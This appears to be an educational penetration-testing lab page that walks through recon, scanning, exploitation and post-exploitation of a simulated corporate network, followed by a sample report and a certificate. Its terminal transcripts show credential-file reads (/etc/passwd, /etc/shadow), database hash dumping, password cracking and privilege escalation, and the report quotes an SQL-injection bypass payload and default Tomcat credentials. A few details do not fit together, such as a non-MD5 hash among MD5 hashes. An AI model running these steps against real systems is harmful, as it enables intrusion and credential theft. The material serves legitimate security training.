Penetration Testing Lab

Welcome to the Ethical Hacking Lab

This interactive lab will guide you through the process of conducting a penetration test on a simulated corporate network. You'll learn how to identify vulnerabilities, exploit them ethically, and provide remediation recommendations.

The lab is designed to provide hands-on experience with popular penetration testing tools like Metasploit, Nmap, and more.

Important Notice

The skills taught in this lab are for educational purposes only. Always obtain proper authorization before performing security testing on any system. Unauthorized penetration testing is illegal and unethical.

Introduction
Reconnaissance
Scanning
Exploitation
Post-Exploitation
Reporting

The Penetration Testing Methodology

Penetration testing follows a structured methodology to systematically identify and exploit vulnerabilities in a controlled manner. The main phases include:

1. Reconnaissance

Gathering information about the target system or network using both passive and active techniques. This may include OSINT (Open Source Intelligence), DNS enumeration, and social engineering.

2. Scanning

Actively probing the target to identify open ports, running services, operating systems, and potential vulnerabilities. Tools like Nmap, Nessus, and OpenVAS are commonly used in this phase.

3. Exploitation

Leveraging discovered vulnerabilities to gain unauthorized access to systems. This may involve using tools like Metasploit, custom exploit code, or manual techniques to exploit weaknesses.

4. Post-Exploitation

After gaining access, collecting sensitive information, establishing persistence, escalating privileges, and pivoting to other systems on the network to demonstrate potential impact.

5. Reporting

Documenting findings, including discovered vulnerabilities, exploitation methods, and specific remediation recommendations. The report should be comprehensive yet understandable to both technical and non-technical stakeholders.

Lab Environment

This lab provides a safe, isolated environment where you can practice penetration testing techniques without legal or ethical concerns. The virtual network consists of deliberately vulnerable machines that simulate real-world scenarios.

You'll have access to common penetration testing tools including:

  • Nmap - Network scanning and host discovery
  • Metasploit Framework - Exploitation toolkit
  • Wireshark - Network packet analysis
  • Burp Suite - Web application security testing
  • John the Ripper - Password cracking

Phase 1: Reconnaissance

Reconnaissance involves gathering information about your target to understand its infrastructure, technologies, and potential entry points. This phase is crucial as it forms the foundation for the rest of your penetration test.

Target Network Information

You've been engaged to perform a penetration test on the following organization:

  • Company Name: Acme Secure Technologies, Inc.
  • Domain: acmesecuretech.lab
  • IP Range: 192.168.1.0/24
  • Scope: All systems within the IP range

Reconnaissance Techniques

Start by gathering information using passive techniques that don't directly interact with the target systems:

  • Domain and whois information
  • DNS records and subdomain enumeration
  • Public information (social media, job postings, etc.)
  • Technology stack identification
Terminal
root@kali:~# whois acmesecuretech.lab
Domain Name: acmesecuretech.lab
Registrar: Internal Lab Domain
Registered On: 2023-01-15
Registrant Organization: Acme Secure Technologies, Inc.
Registrant Country: US
Admin Email: admin@acmesecuretech.lab
root@kali:~# host -t ns acmesecuretech.lab
acmesecuretech.lab name server ns1.acmesecuretech.lab.
acmesecuretech.lab name server ns2.acmesecuretech.lab.
root@kali:~# host -t mx acmesecuretech.lab
acmesecuretech.lab mail is handled by 10 mail.acmesecuretech.lab.
root@kali:~# dnsrecon -d acmesecuretech.lab
[*] Performing General DNS Queries for acmesecuretech.lab
[*] SOA ns1.acmesecuretech.lab 192.168.1.10
[*] NS ns1.acmesecuretech.lab 192.168.1.10
[*] NS ns2.acmesecuretech.lab 192.168.1.11
[*] MX mail.acmesecuretech.lab 192.168.1.15
[*] A www.acmesecuretech.lab 192.168.1.20
[*] A portal.acmesecuretech.lab 192.168.1.25
[*] A intranet.acmesecuretech.lab 192.168.1.30
[*] A admin.acmesecuretech.lab 192.168.1.35
root@kali:~# theHarvester -d acmesecuretech.lab -b all
[*] Starting theHarvester 4.1.0

[*] Emails found: 4
[+] admin@acmesecuretech.lab
[+] john.smith@acmesecuretech.lab
[+] sarah.jones@acmesecuretech.lab
[+] helpdesk@acmesecuretech.lab

[*] Hosts found: 7
[+] ns1.acmesecuretech.lab - 192.168.1.10
[+] ns2.acmesecuretech.lab - 192.168.1.11
[+] mail.acmesecuretech.lab - 192.168.1.15
[+] www.acmesecuretech.lab - 192.168.1.20
[+] portal.acmesecuretech.lab - 192.168.1.25
[+] intranet.acmesecuretech.lab - 192.168.1.30
[+] admin.acmesecuretech.lab - 192.168.1.35

Phase 2: Scanning & Enumeration

Now that you've gathered basic information about the target network, it's time to actively scan for open ports, running services, and potential vulnerabilities. This phase helps identify specific attack vectors for the exploitation phase.

Web Server 192.168.1.20
Mail Server 192.168.1.15
Employee Portal 192.168.1.25
Admin Server 192.168.1.35

Web Server (192.168.1.20)

Scanning www.acmesecuretech.lab
root@kali:~# nmap -sV -sC -p- 192.168.1.20
Starting Nmap 7.92 ( https://nmap.org ) at 2025-04-07 15:30 EDT
Nmap scan report for www.acmesecuretech.lab (192.168.1.20)
Host is up (0.00042s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d8:f5:ef:d2:d3:f9:8d:ad:c6:cf:24:85:93:44:24:4b (RSA)
| 256 46:d4:28:b9:e8:d5:c5:b9:9e:f2:4b:39:9e:de:28:e5 (ECDSA)
|_ 256 8d:2c:6f:b8:2f:55:e6:6c:89:2f:ac:2c:33:c3:19:f2 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Acme Secure Technologies - Home
|_http-server-header: Apache/2.4.41 (Ubuntu)
443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Acme Secure Technologies - Home
|_http-server-header: Apache/2.4.41 (Ubuntu)
| ssl-cert: Subject: commonName=www.acmesecuretech.lab/organizationName=Acme Secure Technologies, Inc.
8080/tcp open http Apache Tomcat 9.0.31
|_http-title: Acme Management Console
|_http-favicon: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
root@kali:~# nikto -h 192.168.1.20
- Nikto v2.1.6
---------------------
+ Target IP: 192.168.1.20
+ Target Hostname: www.acmesecuretech.lab
+ Target Port: 80
---------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.46). Apache 2.2.34 is the EOL for the 2.x branch.
+ OSVDB-3268: /admin/: Directory indexing found.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8348 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2025-04-07 15:33:25 (GMT-4) (125 seconds)
---------------------
+ 1 host(s) tested

Mail Server (192.168.1.15)

Scanning mail.acmesecuretech.lab
root@kali:~# nmap -sV -sC -p- 192.168.1.15
Starting Nmap 7.92 ( https://nmap.org ) at 2025-04-07 15:35 EDT
Nmap scan report for mail.acmesecuretech.lab (192.168.1.15)
Host is up (0.00035s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
25/tcp open smtp Postfix smtpd
110/tcp open pop3 Dovecot pop3d
143/tcp open imap Dovecot imapd
443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Roundcube Webmail :: Welcome to Roundcube Webmail
Service Info: Host: mail.acmesecuretech.lab; OS: Linux; CPE: cpe:/o:linux:linux_kernel
root@kali:~# telnet 192.168.1.15 25
Trying 192.168.1.15...
Connected to 192.168.1.15.
Escape character is '^]'.
220 mail.acmesecuretech.lab ESMTP Postfix (Ubuntu)
EHLO kali
250-mail.acmesecuretech.lab
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-DSN
250 SMTPUTF8
VRFY admin
252 2.0.0 admin
VRFY john.smith
252 2.0.0 john.smith
QUIT
221 2.0.0 Bye
Connection closed by foreign host.

Employee Portal (192.168.1.25)

Scanning portal.acmesecuretech.lab
root@kali:~# nmap -sV -sC -p- 192.168.1.25
Starting Nmap 7.92 ( https://nmap.org ) at 2025-04-07 15:40 EDT
Nmap scan report for portal.acmesecuretech.lab (192.168.1.25)
Host is up (0.00046s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Acme Secure Technologies - Employee Portal
|_http-server-header: Apache/2.4.41 (Ubuntu)
3306/tcp open mysql MySQL 8.0.27-0ubuntu0.20.04.1
| mysql-info:
| Protocol: 10
| Version: 8.0.27-0ubuntu0.20.04.1
| Thread ID: 13
| Capabilities flags: 65535
| Some Capabilities: Support41Auth, DontAllowDatabaseTableColumn, SupportsLoadDataLocal, SwitchToSSLAfterHandshake, IgnoreSigpipes, InteractiveClient, Speaks41ProtocolOld, SupportsTransactions, LongPassword, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, ODBCClient, FoundRows, Speaks41ProtocolNew, LongColumnFlag, SupportsCompression, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
|_ Auth Plugin Name: mysql_native_password
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
root@kali:~# dirb http://192.168.1.25
DIRB v2.22
==============
START_TIME: Wed Apr 7 15:42:35 2025
URL_BASE: http://192.168.1.25/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-------------
GENERATED WORDS: 4612
== Scanning ==
+ http://192.168.1.25/admin (CODE:200|SIZE:1234)
+ http://192.168.1.25/assets (CODE:403|SIZE:277)
+ http://192.168.1.25/css (CODE:403|SIZE:277)
+ http://192.168.1.25/images (CODE:403|SIZE:277)
+ http://192.168.1.25/index.php (CODE:200|SIZE:8701)
+ http://192.168.1.25/js (CODE:403|SIZE:277)
+ http://192.168.1.25/login.php (CODE:200|SIZE:2541)
+ http://192.168.1.25/logout.php (CODE:302|SIZE:0)
+ http://192.168.1.25/profile.php (CODE:302|SIZE:0)
+ http://192.168.1.25/server-status (CODE:403|SIZE:277)
END_TIME: Wed Apr 7 15:48:12 2025
root@kali:~# curl -s http://192.168.1.25/login.php | grep form
<form action="login.php" method="post" class="login-form">
<div class="form-group">
<label for="username">Username</label>
<input type="text" class="form-control" id="username" name="username" required>
</div>
<div class="form-group">
<label for="password">Password</label>
<input type="password" class="form-control" id="password" name="password" required>
</div>
<button type="submit" class="btn btn-primary">Login</button>
</form>

Admin Server (192.168.1.35)

Scanning admin.acmesecuretech.lab
root@kali:~# nmap -sV -sC -p- 192.168.1.35
Starting Nmap 7.92 ( https://nmap.org ) at 2025-04-07 15:50 EDT
Nmap scan report for admin.acmesecuretech.lab (192.168.1.35)
Host is up (0.00051s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Acme Secure Technologies - Admin Portal
|_http-server-header: Apache/2.4.41 (Ubuntu)
445/tcp open netbios-ssn Samba smbd 4.11.6-Ubuntu (Ubuntu Linux 6.1)
3389/tcp open rdp xrdp
5432/tcp open postgresql PostgreSQL DB 12.9
Service Info: Host: ADMIN-SERVER; OS: Linux; CPE: cpe:/o:linux:linux_kernel
root@kali:~# smbclient -L //192.168.1.35 -N
Sharename Type Comment
----------- ---- -------
print$ Disk Printer Drivers
backups Disk Company Backups
IPC$ IPC IPC Service (Samba 4.11.6-Ubuntu)

Server Comment
--------- -------
ADMIN-SERVER Acme Admin Server

Workgroup Master
--------- -------
WORKGROUP ADMIN-SERVER
root@kali:~# smbclient //192.168.1.35/backups -N
Try "help" to get a list of possible commands.
smb: \> ls
  . D 0 Wed Mar 15 13:15:31 2025
  .. D 0 Wed Mar 15 13:15:31 2025
  config_backup.zip N 264082 Wed Mar 15 10:22:36 2025
  employee_list.xlsx N 52341 Wed Mar 15 09:46:12 2025

              64864 blocks of size 1024. 42563 blocks available
smb: \> exit
root@kali:~# searchsploit apache 2.4.41
--------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------- ---------------------------------
Apache HTTP Server 2.4.41 - Remote Code Execution | linux/remote/49933.py
--------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Phase 3: Exploitation

After identifying potential vulnerabilities during the scanning phase, you can now attempt to exploit these weaknesses to gain unauthorized access to the target systems. Remember to document all successful exploits for the final report.

Metasploit Framework

Use Metasploit to exploit known vulnerabilities in the target systems. The framework includes numerous exploit modules, payloads, and post-exploitation tools.

Click to use

SQLMap

Automated SQL injection tool that detects and exploits SQL injection vulnerabilities in web applications. Useful for testing the employee portal login form.

Click to use

Hydra

Fast and flexible online password cracking tool that supports numerous protocols including SSH, FTP, HTTP, SMB, and more. Use it for brute force login attempts.

Click to use

Burp Suite

Web application security testing platform that can intercept and modify HTTP/HTTPS traffic, find vulnerabilities, and exploit web application flaws.

Click to use

Phase 4: Post-Exploitation

After gaining initial access to the target systems, the post-exploitation phase focuses on maintaining access, escalating privileges, and extracting valuable information. This phase demonstrates the potential impact of the identified vulnerabilities.

Post-Exploitation Activities

Common post-exploitation activities include:

  • Privilege escalation to gain administrative/root access
  • Data exfiltration of sensitive information
  • Lateral movement to other systems on the network
  • Persistence mechanisms to maintain access
  • Evidence collection to document the compromise
Post-Exploitation Terminal
root@kali:~# meterpreter > sessions -i 1
[*] Starting interaction with session 1...

meterpreter > getuid
Server username: www-data

meterpreter > sysinfo
Computer : portal.acmesecuretech.lab
OS : Ubuntu 20.04 (Linux 5.4.0-120-generic #136-Ubuntu SMP x86_64)
Meterpreter : php/linux

meterpreter > run post/linux/gather/enum_system
[*] Running module against portal.acmesecuretech.lab
[*] Gathering system information...
[+] Domain: WORKGROUP
[+] Hostname: portal
[+] Kernel: 5.4.0-120-generic #136-Ubuntu SMP
[+] Kernel Hardware: x86_64
[+] Distro: Ubuntu 20.04.4 LTS
[+] Desktop Environment: GNOME
[+] This is a virtual machine

meterpreter > cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:118:MySQL Server,,,:/nonexistent:/bin/false
john:x:1000:1000:John Smith:/home/john:/bin/bash
sarah:x:1001:1001:Sarah Jones:/home/sarah:/bin/bash
admin:x:1002:1002:System Administrator:/home/admin:/bin/bash

meterpreter > find / -name "config.php" -type f 2>/dev/null
/var/www/html/admin/config.php
/var/www/html/includes/config.php

meterpreter > cat /var/www/html/includes/config.php
<?php
// Database connection settings
define('DB_HOST', 'localhost');
define('DB_USER', 'portal_user');
define('DB_PASS', 'P@55w0rd123!');
define('DB_NAME', 'employee_portal');

// Application settings
define('APP_NAME', 'Acme Secure Technologies Employee Portal');
define('ADMIN_EMAIL', 'admin@acmesecuretech.lab');
?>

meterpreter > background
[*] Backgrounding session 1...

root@kali:~# mysql -h 192.168.1.25 -u portal_user -p'P@55w0rd123!' -e "show databases;"
mysql: [Warning] Using a password on the command line interface can be insecure.
+--------------------+
| Database |
+--------------------+
| information_schema |
| employee_portal |
+--------------------+

root@kali:~# mysql -h 192.168.1.25 -u portal_user -p'P@55w0rd123!' -e "use employee_portal; show tables;"
mysql: [Warning] Using a password on the command line interface can be insecure.
+---------------------------+
| Tables_in_employee_portal |
+---------------------------+
| employees |
| login_attempts |
| users |
+---------------------------+

root@kali:~# mysql -h 192.168.1.25 -u portal_user -p'P@55w0rd123!' -e "use employee_portal; select username, password from users;"
mysql: [Warning] Using a password on the command line interface can be insecure.
+----------+----------------------------------+
| username | password |
+----------+----------------------------------+
| admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
| john | 482c811da5d5b4bc6d497ffa98491e38 |
| sarah | 8cb2237d0679ca88db6464eac60da96345513964 |
+----------+----------------------------------+

root@kali:~# echo "5f4dcc3b5aa765d61d8327deb882cf99" > hash.txt
root@kali:~# john --format=raw-md5 hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
password (?)
1g 0:00:00:00 DONE (2025-04-07 16:12) 100.0g/s 19200p/s 19200c/s 19200C/s 123456..michael
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed

root@kali:~# ssh admin@192.168.1.35
admin@192.168.1.35's password: password
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-120-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

Last login: Mon Apr 5 09:32:45 2025 from 192.168.1.100
admin@admin-server:~$ sudo -l
[sudo] password for admin: password
Matching Defaults entries for admin on admin-server:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User admin may run the following commands on admin-server:
(ALL : ALL) ALL

admin@admin-server:~$ sudo su -
root@admin-server:~# id
uid=0(root) gid=0(root) groups=0(root)

root@admin-server:~# ifconfig
enp0s3: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.35 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::216:3eff:fe19:8f57 prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:19:8f:57 txqueuelen 1000 (Ethernet)
RX packets 2563 bytes 1956732 (1.9 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1789 bytes 284781 (284.7 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 168 bytes 12864 (12.8 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 168 bytes 12864 (12.8 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

root@admin-server:~# cat /etc/shadow | grep admin
admin:$6$rPXoN.0h$8rEUmj9xVgDSg0IvXMFG4OT6pYObDD5zLJKZVSMHaH9ZwafpNL3cQKlK4CIxKGO/Uw0kMDFzUlHkOjGEiEZVK/:18752:0:99999:7:::

Post-Exploitation Findings

Collected Sensitive Information:

  1. Database credentials for the employee portal (mysql user: portal_user, password: P@55w0rd123!)
  2. User account credentials (admin/password, john/unknown, sarah/unknown)
  3. Full list of system users including administrative accounts
  4. Administrative access to the admin server (192.168.1.35)
  5. Root/privileged access to multiple systems

Potential Impact:

  • Complete compromise of the company's internal network
  • Access to sensitive employee data and company information
  • Ability to modify or delete critical systems and data
  • Potential for lateral movement to other connected networks

Phase 5: Reporting

The final phase of a penetration test is to compile a comprehensive report documenting your findings, the methodology used, and providing actionable recommendations for remediation. A good penetration test report helps the organization understand their security posture and prioritize fixes.

Elements of a Good Penetration Test Report

A well-structured penetration test report typically includes:

  • Executive Summary for non-technical stakeholders
  • Detailed methodology and scope
  • Findings with severity ratings and evidence
  • Risk assessment and potential business impact
  • Specific remediation recommendations
  • Technical appendices with detailed proof-of-concept information

Penetration Test Report - Executive Summary

This penetration test was conducted against Acme Secure Technologies' network infrastructure between April 5-7, 2025. The assessment identified several critical and high-risk vulnerabilities that could allow malicious actors to compromise the organization's systems and data.

The most significant findings include:

  1. SQL Injection in Employee Portal - Allows complete bypass of authentication controls and access to sensitive employee information
  2. Default Credentials on Tomcat Manager - Provides the ability to deploy malicious web applications to the production web server
  3. Insecure File Sharing Configuration - Exposes sensitive configuration backups and employee data
  4. Weak Password Policies - Administrative accounts using easily guessable passwords
  5. Unrestricted Lateral Movement - Lack of network segmentation allowing easy pivoting between systems

Overall, the security posture of the organization is concerning. Immediate remediation of the identified vulnerabilities is strongly recommended to prevent potential data breaches or system compromise.

Vulnerability Details

SQL Injection in Employee Portal High

Description: The employee portal login form at http://192.168.1.25/login.php is vulnerable to SQL injection attacks, allowing authentication bypass and unauthorized access to the application.

Evidence: Authentication bypass was achieved using the payload admin' or 1=1 -- in the username field. This provided access to the portal with administrative privileges.

Impact: An attacker can bypass authentication, access sensitive employee data, and potentially extract database contents including user credentials.

Recommendation: Implement parameterized SQL queries or prepared statements to prevent SQL injection. Use an ORM framework if possible and validate all user inputs.

Default Credentials on Tomcat Manager High

Description: The Apache Tomcat Manager application on http://192.168.1.20:8080/manager/ uses default credentials, allowing unauthorized access to the web application management interface.

Evidence: Access was gained using the credentials tomcat:s3cret, which are well-known default credentials for Tomcat installations.

Impact: An attacker can deploy malicious web applications to the server, which can lead to remote code execution and complete system compromise.

Recommendation: Change default credentials immediately. Implement a strong, unique password and consider implementing IP restrictions for accessing the management interface.

Insecure File Sharing Configuration Medium

Description: The Samba share "backups" on 192.168.1.35 allows anonymous access without authentication, exposing sensitive files.

Evidence: Access was gained using the command smbclient //192.168.1.35/backups -N, which connected without requiring credentials. Sensitive files such as configuration backups and employee lists were accessible.

Impact: An attacker can access sensitive company data, including configuration files that may contain credentials and employee information.

Recommendation: Reconfigure the Samba share to require authentication, implement proper access controls, and review the necessity of sharing sensitive files.

Remediation Recommendations

Short-term Recommendations (0-30 days):

  1. Fix the SQL injection vulnerability in the employee portal by implementing parameterized queries
  2. Change all default and weak passwords, especially for administrative accounts
  3. Reconfigure the Samba share to require authentication and restrict access
  4. Apply security patches for Apache, Tomcat, and other services
  5. Enable input validation for all web applications

Medium-term Recommendations (30-90 days):

  1. Implement network segmentation to limit lateral movement between systems
  2. Deploy a web application firewall (WAF) to protect against common web attacks
  3. Implement a robust password policy requiring complex passwords and multi-factor authentication
  4. Conduct security awareness training for employees, focusing on password security and phishing awareness
  5. Implement centralized logging and monitoring to detect suspicious activities

Long-term Recommendations (90+ days):

  1. Implement a comprehensive vulnerability management program with regular scanning
  2. Conduct penetration tests at least annually to identify new vulnerabilities
  3. Deploy an intrusion detection/prevention system (IDS/IPS)
  4. Develop an incident response plan and conduct regular tabletop exercises
  5. Consider implementing a security information and event management (SIEM) solution

Certificate of Completion

Penetration Testing Lab

This certificate is awarded to

[Your Name Here]

For successfully completing the Penetration Testing Lab and demonstrating proficiency in ethical hacking techniques, vulnerability assessment, and security reporting.

Aziz Alghamdi

Instructor

May 1, 2025

Date